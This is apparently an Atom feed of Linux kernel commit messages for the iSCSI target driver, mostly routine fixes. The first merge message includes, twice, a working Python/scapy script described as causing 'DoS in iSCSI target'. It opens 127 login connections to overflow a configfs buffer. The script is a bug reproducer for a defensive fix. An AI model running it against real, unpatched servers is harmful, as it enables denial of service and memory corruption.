<feed xmlns='http://www.w3.org/2005/Atom'>
<title>linux.git/drivers/target/iscsi, branch v6.6</title>
<subtitle>Linux kernel source tree</subtitle>
<link rel='alternate' type='text/html' href='https://git.tavy.me/linux.git/'/>
<entry>
<title>Merge patch series "scsi: target: iscsi: Get rid of sprintf in iscsi_target_configfs.c"</title>
<updated>2023-07-31T16:11:17+00:00</updated>
<author>
<name>Martin K. Petersen</name>
<email>martin.petersen@oracle.com</email>
</author>
<published>2023-07-31T16:11:17+00:00</published>
<link rel='alternate' type='text/html' href='https://git.tavy.me/linux.git/commit/?id=31799f9e6ac09e2e3ffb4091c236b28394ded713'/>
<id>31799f9e6ac09e2e3ffb4091c236b28394ded713</id>
<content type='text'>
Konstantin Shelekhin &lt;k.shelekhin@yadro.com&gt; says:

This patch series cleanses iscsi_target_configfs.c of sprintf
usage. The first patch fixes the real problem, the second just makes
sure we are on the safe side from now on.

I've reproduced the issue fixed in the first patch by utilizing this
cool thing:

  https://git.sr.ht/~kshelekhin/scapy-iscsi

Yeah, shameless promoting of my own tools, but I like the simplicity
of scapy and writing tests in C with libiscsi can be a little
cumbersome.

Check it out:

  #!/usr/bin/env python3
  # Let's cause some DoS in iSCSI target

  import sys

  from scapy.supersocket import StreamSocket
  from scapy_iscsi.iscsi import *

  cpr = {
      "InitiatorName": "iqn.2016-04.com.open-iscsi:e476cd9e4e59",
      "TargetName": "iqn.2023-07.com.example:target",
      "HeaderDigest": "None",
      "DataDigest": "None",
  }

  spr = {
      "SessionType": "Normal",
      "ErrorRecoveryLevel": 0,
      "DefaultTime2Retain": 0,
      "DefaultTime2Wait": 2,
      "ImmediateData": "Yes",
      "FirstBurstLength": 65536,
      "MaxBurstLength": 262144,
      "MaxRecvDataSegmentLength": 262144,
      "MaxOutstandingR2T": 1,
  }

  if len(sys.argv) != 3:
      print("usage: dos.py &lt;host&gt; &lt;port&gt;", file=sys.stderr)
      exit(1)

  host = sys.argv[1]
  port = int(sys.argv[2])
  isid = 0xB00B
  tsih = 0
  connections = []

  for i in range(0, 127):
      s = socket.socket()
      s.connect((host, port))
      s = StreamSocket(s, ISCSI)

      ds = cpr if i &gt; 0 else cpr | spr
      lirq = ISCSI() / LoginRequest(isid=isid, tsih=tsih, cid=i, ds=kv2text(ds))
      lirs = s.sr1(lirq)
      tsih = lirs.tsih

      connections.append(s)

  input()

Link: https://lore.kernel.org/r/20230722152657.168859-1-k.shelekhin@yadro.com
Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
Konstantin Shelekhin &lt;k.shelekhin@yadro.com&gt; says:

This patch series cleanses iscsi_target_configfs.c of sprintf
usage. The first patch fixes the real problem, the second just makes
sure we are on the safe side from now on.

I've reproduced the issue fixed in the first patch by utilizing this
cool thing:

  https://git.sr.ht/~kshelekhin/scapy-iscsi

Yeah, shameless promoting of my own tools, but I like the simplicity
of scapy and writing tests in C with libiscsi can be a little
cumbersome.

Check it out:

  #!/usr/bin/env python3
  # Let's cause some DoS in iSCSI target

  import sys

  from scapy.supersocket import StreamSocket
  from scapy_iscsi.iscsi import *

  cpr = {
      "InitiatorName": "iqn.2016-04.com.open-iscsi:e476cd9e4e59",
      "TargetName": "iqn.2023-07.com.example:target",
      "HeaderDigest": "None",
      "DataDigest": "None",
  }

  spr = {
      "SessionType": "Normal",
      "ErrorRecoveryLevel": 0,
      "DefaultTime2Retain": 0,
      "DefaultTime2Wait": 2,
      "ImmediateData": "Yes",
      "FirstBurstLength": 65536,
      "MaxBurstLength": 262144,
      "MaxRecvDataSegmentLength": 262144,
      "MaxOutstandingR2T": 1,
  }

  if len(sys.argv) != 3:
      print("usage: dos.py &lt;host&gt; &lt;port&gt;", file=sys.stderr)
      exit(1)

  host = sys.argv[1]
  port = int(sys.argv[2])
  isid = 0xB00B
  tsih = 0
  connections = []

  for i in range(0, 127):
      s = socket.socket()
      s.connect((host, port))
      s = StreamSocket(s, ISCSI)

      ds = cpr if i &gt; 0 else cpr | spr
      lirq = ISCSI() / LoginRequest(isid=isid, tsih=tsih, cid=i, ds=kv2text(ds))
      lirs = s.sr1(lirq)
      tsih = lirs.tsih

      connections.append(s)

  input()

Link: https://lore.kernel.org/r/20230722152657.168859-1-k.shelekhin@yadro.com
Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</pre>
</div>
</content>
</entry>
<entry>
<title>scsi: target: iscsi: Stop using sprintf() in iscsi_target_configfs.c</title>
<updated>2023-07-31T16:09:58+00:00</updated>
<author>
<name>Konstantin Shelekhin</name>
<email>k.shelekhin@yadro.com</email>
</author>
<published>2023-07-22T15:26:38+00:00</published>
<link rel='alternate' type='text/html' href='https://git.tavy.me/linux.git/commit/?id=c0431feb0a75e24afe60a8090c9f93dd9e33fd81'/>
<id>c0431feb0a75e24afe60a8090c9f93dd9e33fd81</id>
<content type='text'>
Get rid of sprintf() in favor of sysfs_emit(). The latter ensures not to
overflow the given buffer.

Signed-off-by: Konstantin Shelekhin &lt;k.shelekhin@yadro.com&gt;
Link: https://lore.kernel.org/r/20230722152657.168859-3-k.shelekhin@yadro.com
Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
Get rid of sprintf() in favor of sysfs_emit(). The latter ensures not to
overflow the given buffer.

Signed-off-by: Konstantin Shelekhin &lt;k.shelekhin@yadro.com&gt;
Link: https://lore.kernel.org/r/20230722152657.168859-3-k.shelekhin@yadro.com
Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</pre>
</div>
</content>
</entry>
<entry>
<title>scsi: target: iscsi: Fix buffer overflow in lio_target_nacl_info_show()</title>
<updated>2023-07-31T16:09:58+00:00</updated>
<author>
<name>Konstantin Shelekhin</name>
<email>k.shelekhin@yadro.com</email>
</author>
<published>2023-07-22T15:26:37+00:00</published>
<link rel='alternate' type='text/html' href='https://git.tavy.me/linux.git/commit/?id=801f287c93ff95582b0a2d2163f12870a2f076d4'/>
<id>801f287c93ff95582b0a2d2163f12870a2f076d4</id>
<content type='text'>
The function lio_target_nacl_info_show() uses sprintf() in a loop to print
details for every iSCSI connection in a session without checking for the
buffer length. With enough iSCSI connections it's possible to overflow the
buffer provided by configfs and corrupt the memory.

This patch replaces sprintf() with sysfs_emit_at() that checks for buffer
boundries.

Signed-off-by: Konstantin Shelekhin &lt;k.shelekhin@yadro.com&gt;
Link: https://lore.kernel.org/r/20230722152657.168859-2-k.shelekhin@yadro.com
Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
The function lio_target_nacl_info_show() uses sprintf() in a loop to print
details for every iSCSI connection in a session without checking for the
buffer length. With enough iSCSI connections it's possible to overflow the
buffer provided by configfs and corrupt the memory.

This patch replaces sprintf() with sysfs_emit_at() that checks for buffer
boundries.

Signed-off-by: Konstantin Shelekhin &lt;k.shelekhin@yadro.com&gt;
Link: https://lore.kernel.org/r/20230722152657.168859-2-k.shelekhin@yadro.com
Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</pre>
</div>
</content>
</entry>
<entry>
<title>scsi: target: iscsi: Remove the unused netif_timeout attribute</title>
<updated>2023-07-11T16:33:32+00:00</updated>
<author>
<name>Maurizio Lombardi</name>
<email>mlombard@redhat.com</email>
</author>
<published>2023-06-30T15:53:09+00:00</published>
<link rel='alternate' type='text/html' href='https://git.tavy.me/linux.git/commit/?id=30a5b62e1c83d7660c6c471915ad968b6c6b7d98'/>
<id>30a5b62e1c83d7660c6c471915ad968b6c6b7d98</id>
<content type='text'>
This attribute has never been used, remove it.

Signed-off-by: Maurizio Lombardi &lt;mlombard@redhat.com&gt;
Link: https://lore.kernel.org/r/20230630155309.46061-1-mlombard@redhat.com
Reviewed-by: Mike Christie &lt;michael.christie@oracle.com&gt;
Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
This attribute has never been used, remove it.

Signed-off-by: Maurizio Lombardi &lt;mlombard@redhat.com&gt;
Link: https://lore.kernel.org/r/20230630155309.46061-1-mlombard@redhat.com
Reviewed-by: Mike Christie &lt;michael.christie@oracle.com&gt;
Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</pre>
</div>
</content>
</entry>
<entry>
<title>Merge tag 'scsi-misc' of git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi</title>
<updated>2023-06-30T18:57:07+00:00</updated>
<author>
<name>Linus Torvalds</name>
<email>torvalds@linux-foundation.org</email>
</author>
<published>2023-06-30T18:57:07+00:00</published>
<link rel='alternate' type='text/html' href='https://git.tavy.me/linux.git/commit/?id=ca7ce08d6a063e0ccb91dc57f9bc213120d0d1a7'/>
<id>ca7ce08d6a063e0ccb91dc57f9bc213120d0d1a7</id>
<content type='text'>
Pull SCSI updates from James Bottomley:
 "Updates to the usual drivers (ufs, pm80xx, libata-scsi, smartpqi,
  lpfc, qla2xxx).

  We have a couple of major core changes impacting other systems:

   - Command Duration Limits, which spills into block and ATA

   - block level Persistent Reservation Operations, which touches block,
     nvme, target and dm

  Both of these are added with merge commits containing a cover letter
  explaining what's going on"

* tag 'scsi-misc' of git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi: (187 commits)
  scsi: core: Improve warning message in scsi_device_block()
  scsi: core: Replace scsi_target_block() with scsi_block_targets()
  scsi: core: Don't wait for quiesce in scsi_device_block()
  scsi: core: Don't wait for quiesce in scsi_stop_queue()
  scsi: core: Merge scsi_internal_device_block() and device_block()
  scsi: sg: Increase number of devices
  scsi: bsg: Increase number of devices
  scsi: qla2xxx: Remove unused nvme_ls_waitq wait queue
  scsi: ufs: ufs-pci: Add support for Intel Arrow Lake
  scsi: sd: sd_zbc: Use PAGE_SECTORS_SHIFT
  scsi: ufs: wb: Add explicit flush_threshold sysfs attribute
  scsi: ufs: ufs-qcom: Switch to the new ICE API
  scsi: ufs: dt-bindings: qcom: Add ICE phandle
  scsi: ufs: ufs-mediatek: Set UFSHCD_QUIRK_MCQ_BROKEN_RTC quirk
  scsi: ufs: ufs-mediatek: Set UFSHCD_QUIRK_MCQ_BROKEN_INTR quirk
  scsi: ufs: core: Add host quirk UFSHCD_QUIRK_MCQ_BROKEN_RTC
  scsi: ufs: core: Add host quirk UFSHCD_QUIRK_MCQ_BROKEN_INTR
  scsi: ufs: core: Remove dedicated hwq for dev command
  scsi: ufs: core: mcq: Fix the incorrect OCS value for the device command
  scsi: ufs: dt-bindings: samsung,exynos: Drop unneeded quotes
  ...
</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
Pull SCSI updates from James Bottomley:
 "Updates to the usual drivers (ufs, pm80xx, libata-scsi, smartpqi,
  lpfc, qla2xxx).

  We have a couple of major core changes impacting other systems:

   - Command Duration Limits, which spills into block and ATA

   - block level Persistent Reservation Operations, which touches block,
     nvme, target and dm

  Both of these are added with merge commits containing a cover letter
  explaining what's going on"

* tag 'scsi-misc' of git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi: (187 commits)
  scsi: core: Improve warning message in scsi_device_block()
  scsi: core: Replace scsi_target_block() with scsi_block_targets()
  scsi: core: Don't wait for quiesce in scsi_device_block()
  scsi: core: Don't wait for quiesce in scsi_stop_queue()
  scsi: core: Merge scsi_internal_device_block() and device_block()
  scsi: sg: Increase number of devices
  scsi: bsg: Increase number of devices
  scsi: qla2xxx: Remove unused nvme_ls_waitq wait queue
  scsi: ufs: ufs-pci: Add support for Intel Arrow Lake
  scsi: sd: sd_zbc: Use PAGE_SECTORS_SHIFT
  scsi: ufs: wb: Add explicit flush_threshold sysfs attribute
  scsi: ufs: ufs-qcom: Switch to the new ICE API
  scsi: ufs: dt-bindings: qcom: Add ICE phandle
  scsi: ufs: ufs-mediatek: Set UFSHCD_QUIRK_MCQ_BROKEN_RTC quirk
  scsi: ufs: ufs-mediatek: Set UFSHCD_QUIRK_MCQ_BROKEN_INTR quirk
  scsi: ufs: core: Add host quirk UFSHCD_QUIRK_MCQ_BROKEN_RTC
  scsi: ufs: core: Add host quirk UFSHCD_QUIRK_MCQ_BROKEN_INTR
  scsi: ufs: core: Remove dedicated hwq for dev command
  scsi: ufs: core: mcq: Fix the incorrect OCS value for the device command
  scsi: ufs: dt-bindings: samsung,exynos: Drop unneeded quotes
  ...
</pre>
</div>
</content>
</entry>
<entry>
<title>scsi: target: iscsi: Use sendmsg(MSG_SPLICE_PAGES) rather than sendpage</title>
<updated>2023-06-24T22:50:13+00:00</updated>
<author>
<name>David Howells</name>
<email>dhowells@redhat.com</email>
</author>
<published>2023-06-23T22:55:09+00:00</published>
<link rel='alternate' type='text/html' href='https://git.tavy.me/linux.git/commit/?id=d2fe21077d6d4687ecab642ffe97c2e4acf3a547'/>
<id>d2fe21077d6d4687ecab642ffe97c2e4acf3a547</id>
<content type='text'>
Use sendmsg() with MSG_SPLICE_PAGES rather than sendpage.  This allows
multiple pages and multipage folios to be passed through.

TODO: iscsit_fe_sendpage_sg() should perhaps set up a bio_vec array for the
entire set of pages it's going to transfer plus two for the header and
trailer and page fragments to hold the header and trailer - and then call
sendmsg once for the entire message.

Signed-off-by: David Howells &lt;dhowells@redhat.com&gt;
cc: Mike Christie &lt;michael.christie@oracle.com&gt;
cc: Maurizio Lombardi &lt;mlombard@redhat.com&gt;
cc: "James E.J. Bottomley" &lt;jejb@linux.ibm.com&gt;
cc: "Martin K. Petersen" &lt;martin.petersen@oracle.com&gt;
cc: Jens Axboe &lt;axboe@kernel.dk&gt;
cc: Matthew Wilcox &lt;willy@infradead.org&gt;
cc: Al Viro &lt;viro@zeniv.linux.org.uk&gt;
cc: open-iscsi@googlegroups.com
Link: https://lore.kernel.org/r/20230623225513.2732256-13-dhowells@redhat.com
Signed-off-by: Jakub Kicinski &lt;kuba@kernel.org&gt;
</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
Use sendmsg() with MSG_SPLICE_PAGES rather than sendpage.  This allows
multiple pages and multipage folios to be passed through.

TODO: iscsit_fe_sendpage_sg() should perhaps set up a bio_vec array for the
entire set of pages it's going to transfer plus two for the header and
trailer and page fragments to hold the header and trailer - and then call
sendmsg once for the entire message.

Signed-off-by: David Howells &lt;dhowells@redhat.com&gt;
cc: Mike Christie &lt;michael.christie@oracle.com&gt;
cc: Maurizio Lombardi &lt;mlombard@redhat.com&gt;
cc: "James E.J. Bottomley" &lt;jejb@linux.ibm.com&gt;
cc: "Martin K. Petersen" &lt;martin.petersen@oracle.com&gt;
cc: Jens Axboe &lt;axboe@kernel.dk&gt;
cc: Matthew Wilcox &lt;willy@infradead.org&gt;
cc: Al Viro &lt;viro@zeniv.linux.org.uk&gt;
cc: open-iscsi@googlegroups.com
Link: https://lore.kernel.org/r/20230623225513.2732256-13-dhowells@redhat.com
Signed-off-by: Jakub Kicinski &lt;kuba@kernel.org&gt;
</pre>
</div>
</content>
</entry>
<entry>
<title>scsi: target: iscsi: Prevent login threads from racing between each other</title>
<updated>2023-05-22T20:29:39+00:00</updated>
<author>
<name>Maurizio Lombardi</name>
<email>mlombard@redhat.com</email>
</author>
<published>2023-05-08T16:22:19+00:00</published>
<link rel='alternate' type='text/html' href='https://git.tavy.me/linux.git/commit/?id=2a737d3b8c792400118d6cf94958f559de9c5e59'/>
<id>2a737d3b8c792400118d6cf94958f559de9c5e59</id>
<content type='text'>
The tpg-&gt;np_login_sem is a semaphore that is used to serialize the login
process when multiple login threads run concurrently against the same
target portal group.

The iscsi_target_locate_portal() function finds the tpg, calls
iscsit_access_np() against the np_login_sem semaphore and saves the tpg
pointer in conn-&gt;tpg;

If iscsi_target_locate_portal() fails, the caller will check for the
conn-&gt;tpg pointer and, if it's not NULL, then it will assume that
iscsi_target_locate_portal() called iscsit_access_np() on the semaphore.

Make sure that conn-&gt;tpg gets initialized only if iscsit_access_np() was
successful, otherwise iscsit_deaccess_np() may end up being called against
a semaphore we never took, allowing more than one thread to access the same
tpg.

Signed-off-by: Maurizio Lombardi &lt;mlombard@redhat.com&gt;
Link: https://lore.kernel.org/r/20230508162219.1731964-4-mlombard@redhat.com
Reviewed-by: Mike Christie &lt;michael.christie@oracle.com&gt;
Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
The tpg-&gt;np_login_sem is a semaphore that is used to serialize the login
process when multiple login threads run concurrently against the same
target portal group.

The iscsi_target_locate_portal() function finds the tpg, calls
iscsit_access_np() against the np_login_sem semaphore and saves the tpg
pointer in conn-&gt;tpg;

If iscsi_target_locate_portal() fails, the caller will check for the
conn-&gt;tpg pointer and, if it's not NULL, then it will assume that
iscsi_target_locate_portal() called iscsit_access_np() on the semaphore.

Make sure that conn-&gt;tpg gets initialized only if iscsit_access_np() was
successful, otherwise iscsit_deaccess_np() may end up being called against
a semaphore we never took, allowing more than one thread to access the same
tpg.

Signed-off-by: Maurizio Lombardi &lt;mlombard@redhat.com&gt;
Link: https://lore.kernel.org/r/20230508162219.1731964-4-mlombard@redhat.com
Reviewed-by: Mike Christie &lt;michael.christie@oracle.com&gt;
Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</pre>
</div>
</content>
</entry>
<entry>
<title>scsi: target: iscsi: Fix hang in the iSCSI login code</title>
<updated>2023-05-22T20:29:39+00:00</updated>
<author>
<name>Maurizio Lombardi</name>
<email>mlombard@redhat.com</email>
</author>
<published>2023-05-08T16:22:17+00:00</published>
<link rel='alternate' type='text/html' href='https://git.tavy.me/linux.git/commit/?id=13247018d68f21e7132924b9853f7e2c423588b6'/>
<id>13247018d68f21e7132924b9853f7e2c423588b6</id>
<content type='text'>
If the initiator suddenly stops sending data during a login while keeping
the TCP connection open, the login_work won't be scheduled and will never
release the login semaphore; concurrent login operations will therefore get
stuck and fail.

The bug is due to the inability of the login timeout code to properly
handle this particular case.

Fix the problem by replacing the old per-NP login timer with a new
per-connection timer.

The timer is started when an initiator connects to the target; if it
expires, it sends a SIGINT signal to the thread pointed at by the
conn-&gt;login_kworker pointer.

conn-&gt;login_kworker is set by calling the iscsit_set_login_timer_kworker()
helper, initially it will point to the np thread; When the login
operation's control is in the process of being passed from the NP-thread to
login_work, the conn-&gt;login_worker pointer is set to NULL.  Finally,
login_kworker will be changed to point to the worker thread executing the
login_work job.

If conn-&gt;login_kworker is NULL when the timer expires, it means that the
login operation hasn't been completed yet but login_work isn't running, in
this case the timer will mark the login process as failed and will schedule
login_work so the latter will be forced to free the resources it holds.

Signed-off-by: Maurizio Lombardi &lt;mlombard@redhat.com&gt;
Link: https://lore.kernel.org/r/20230508162219.1731964-2-mlombard@redhat.com
Reviewed-by: Mike Christie &lt;michael.christie@oracle.com&gt;
Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
If the initiator suddenly stops sending data during a login while keeping
the TCP connection open, the login_work won't be scheduled and will never
release the login semaphore; concurrent login operations will therefore get
stuck and fail.

The bug is due to the inability of the login timeout code to properly
handle this particular case.

Fix the problem by replacing the old per-NP login timer with a new
per-connection timer.

The timer is started when an initiator connects to the target; if it
expires, it sends a SIGINT signal to the thread pointed at by the
conn-&gt;login_kworker pointer.

conn-&gt;login_kworker is set by calling the iscsit_set_login_timer_kworker()
helper, initially it will point to the np thread; When the login
operation's control is in the process of being passed from the NP-thread to
login_work, the conn-&gt;login_worker pointer is set to NULL.  Finally,
login_kworker will be changed to point to the worker thread executing the
login_work job.

If conn-&gt;login_kworker is NULL when the timer expires, it means that the
login operation hasn't been completed yet but login_work isn't running, in
this case the timer will mark the login process as failed and will schedule
login_work so the latter will be forced to free the resources it holds.

Signed-off-by: Maurizio Lombardi &lt;mlombard@redhat.com&gt;
Link: https://lore.kernel.org/r/20230508162219.1731964-2-mlombard@redhat.com
Reviewed-by: Mike Christie &lt;michael.christie@oracle.com&gt;
Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</pre>
</div>
</content>
</entry>
<entry>
<title>scsi: target: Replace all non-returning strlcpy() with strscpy()</title>
<updated>2023-05-17T01:39:44+00:00</updated>
<author>
<name>Azeem Shaikh</name>
<email>azeemshaikh38@gmail.com</email>
</author>
<published>2023-05-16T02:53:22+00:00</published>
<link rel='alternate' type='text/html' href='https://git.tavy.me/linux.git/commit/?id=0871237a946e2b16e82048d92d69058fddb9172a'/>
<id>0871237a946e2b16e82048d92d69058fddb9172a</id>
<content type='text'>
strlcpy() reads the entire source buffer first.  This read may exceed the
destination size limit.  This is both inefficient and can lead to linear
read overflows if a source string is not NUL-terminated [1].  In an effort
to remove strlcpy() completely [2], replace strlcpy() here with strscpy().
No return values were used, so direct replacement is safe.

[1] https://www.kernel.org/doc/html/latest/process/deprecated.html#strlcpy
[2] https://github.com/KSPP/linux/issues/89

Signed-off-by: Azeem Shaikh &lt;azeemshaikh38@gmail.com&gt;
Link: https://lore.kernel.org/r/20230516025322.2804923-1-azeemshaikh38@gmail.com
Reviewed-by: Kees Cook &lt;keescook@chromium.org&gt;
Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
strlcpy() reads the entire source buffer first.  This read may exceed the
destination size limit.  This is both inefficient and can lead to linear
read overflows if a source string is not NUL-terminated [1].  In an effort
to remove strlcpy() completely [2], replace strlcpy() here with strscpy().
No return values were used, so direct replacement is safe.

[1] https://www.kernel.org/doc/html/latest/process/deprecated.html#strlcpy
[2] https://github.com/KSPP/linux/issues/89

Signed-off-by: Azeem Shaikh &lt;azeemshaikh38@gmail.com&gt;
Link: https://lore.kernel.org/r/20230516025322.2804923-1-azeemshaikh38@gmail.com
Reviewed-by: Kees Cook &lt;keescook@chromium.org&gt;
Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</pre>
</div>
</content>
</entry>
<entry>
<title>Merge branch '6.3/scsi-fixes' into 6.4/scsi-staging</title>
<updated>2023-04-01T01:45:14+00:00</updated>
<author>
<name>Martin K. Petersen</name>
<email>martin.petersen@oracle.com</email>
</author>
<published>2023-04-01T01:45:14+00:00</published>
<link rel='alternate' type='text/html' href='https://git.tavy.me/linux.git/commit/?id=f467b865cf5b25aac3feee3fb5e25b90f5df35c4'/>
<id>f467b865cf5b25aac3feee3fb5e25b90f5df35c4</id>
<content type='text'>
Pull in the fixes branch to resolve an mpi3mr conflict reported by
sfr.

Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
Pull in the fixes branch to resolve an mpi3mr conflict reported by
sfr.

Signed-off-by: Martin K. Petersen &lt;martin.petersen@oracle.com&gt;
</pre>
</div>
</content>
</entry>
</feed>
